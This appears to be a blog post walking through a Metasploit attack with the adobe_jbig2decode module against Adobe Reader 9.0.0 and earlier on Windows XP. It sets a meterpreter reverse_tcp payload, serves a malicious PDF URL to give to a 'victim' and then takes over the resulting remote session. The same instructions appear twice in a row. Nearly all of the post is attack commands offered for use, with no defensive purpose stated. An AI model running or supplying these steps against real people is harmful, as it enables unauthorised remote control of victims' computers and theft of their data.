This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Exploit Targets
0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)
1 – Adobe Reader v8.1.2 (Windows XP SP2 English)
Attacker:metasploit
Victim PC: Windows XP
Open terminal type
msfconsole
use exploit/windows/browser/adobe_jbig2decode
Msf exploit(adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4(IP of Local Host)
Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4(This must be an address on the local machine)
Msf exploit (adobe_jbig2decode)>set uripathakonsong(The Url to use for this exploit)
Msf exploit (adobe_jbig2decode)>exploit
Now an URL you should give to your victimhttp://192.168.1.4:8080/akonsong
When the victim opens that link in their browser, immediately it will alert a dialog box about akonsong PDF .
Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Exploit Targets
0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)
1 – Adobe Reader v8.1.2 (Windows XP SP2 English)
Requirement
Attacker:metasploit
Victim PC: Windows XP
Open terminal type
msfconsole
use exploit/windows/browser/adobe_jbig2decode
Msf exploit(adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4(IP of Local Host)
Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4(This must be an address on the local machine)
Msf exploit (adobe_jbig2decode)>set uripathakonsong(The Url to use for this exploit)
Msf exploit (adobe_jbig2decode)>exploit
Now an URL you should give to your victimhttp://192.168.1.4:8080/akonsong
Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
No comments:
Post a Comment